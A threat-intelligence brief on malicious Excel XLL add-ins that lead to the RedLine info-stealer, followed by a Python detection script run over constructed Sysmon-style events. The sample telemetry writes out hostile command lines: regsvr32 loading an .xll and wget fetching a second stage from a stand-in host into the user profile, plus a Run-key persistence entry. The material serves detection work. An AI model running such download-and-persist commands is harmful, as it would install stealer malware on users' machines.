Microsoft Excel (XLL) Leads to RedLine Info-Stealer
Industry: N/A | Level: Tactical | Source: BleepingComputer
Threat actors are using public discussion forums and article comment systems to spread malicious Excel documents that ultimately download and install the RedLine information stealer. The malicious links are hosted on Google Drive and download an XLL, which BleepingComputer describes as "an add-in that allows developers to extend the functionality of Excel by reading and writing data, importing data from other sources, or creating custom functions to perform various tasks. XLL files are simply a DLL file that includes an 'xlAutoOpen' function executed by Microsoft Excel when the add-in is opened." While test executions have been unsuccessful, potentially due to incompatible versions of Microsoft Excel, the sequence appears to involve the DLL being executed with regsvr32 or rundll32, which extracts the wget.exe program to download the RedLine binary and save it as %UserProfile%\JavaBridge32.exe. Once downloaded, an autorun registry entry launches the malware and provides persistence.
- Anvilogic Scenario: Malicious Document Delivering Malware
- Anvilogic Use Cases:
  - regsvr32 Execution
  - Rundll32 Command Line
  - Invoke-WebRequest Command
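Detection logic for the execution chain described above, written as an added example (it is not code from BleepingComputer or Anvilogic) and run over constructed Sysmon-style process-creation and registry events; the file paths, user name and download URL are assumed sample values, and the benign regsvr32 call is included to show the rules do not fire on ordinary DLL registration:

```python
import ntpath
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry (not real logs), modelled on Sysmon process
# creation and registry value-set events, covering each stage in the report
# plus one benign regsvr32 call that must not alert.
EVENTS: List[Dict[str, str]] = [
    {"type": "process", "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Users\alice\Downloads\invoice.xll"'},
    {"type": "process", "parent": r"C:\Windows\System32\regsvr32.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\wget.exe",
     "cmdline": r"wget.exe -O C:\Users\alice\JavaBridge32.exe http://example.invalid/stage2"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\JavaBridge32",
     "value": r"C:\Users\alice\JavaBridge32.exe"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"},
]

LOLBINS = {"regsvr32.exe", "rundll32.exe"}
# An executable sitting directly in a user profile root, e.g. %UserProfile%\JavaBridge32.exe
PROFILE_ROOT_EXE = re.compile(r"^[a-z]:\\users\\[^\\]+\\[^\\]+\.exe$", re.I)

def base(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()

def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule, evidence) pairs for events matching the XLL -> RedLine chain."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        if ev["type"] == "process":
            parent, image, cmd = base(ev["parent"]), base(ev["image"]), ev["cmdline"]
            # Stage 1: Excel hands an .xll to regsvr32 or rundll32
            if parent == "excel.exe" and image in LOLBINS and ".xll" in cmd.lower():
                hits.append(("office_spawned_xll_loader", cmd))
            # Stage 2: the LOLBin launches wget.exe to fetch the second stage
            elif parent in LOLBINS and image == "wget.exe":
                hits.append(("lolbin_wget_download", cmd))
        elif ev["type"] == "registry":
            # Stage 3: Run-key autorun pointing at an EXE dropped in the profile root
            if "\\currentversion\\run\\" in ev["key"].lower() and PROFILE_ROOT_EXE.match(ev["value"]):
                hits.append(("run_key_profile_root_exe", ev["value"]))
    return hits

if __name__ == "__main__":
    for rule, evidence in detect(EVENTS):
        print(f"[{rule}] {evidence}")
```

The three rules map onto the use cases listed above; tuning the parent-process and path conditions to the environment's own Office install paths is the main deployment step.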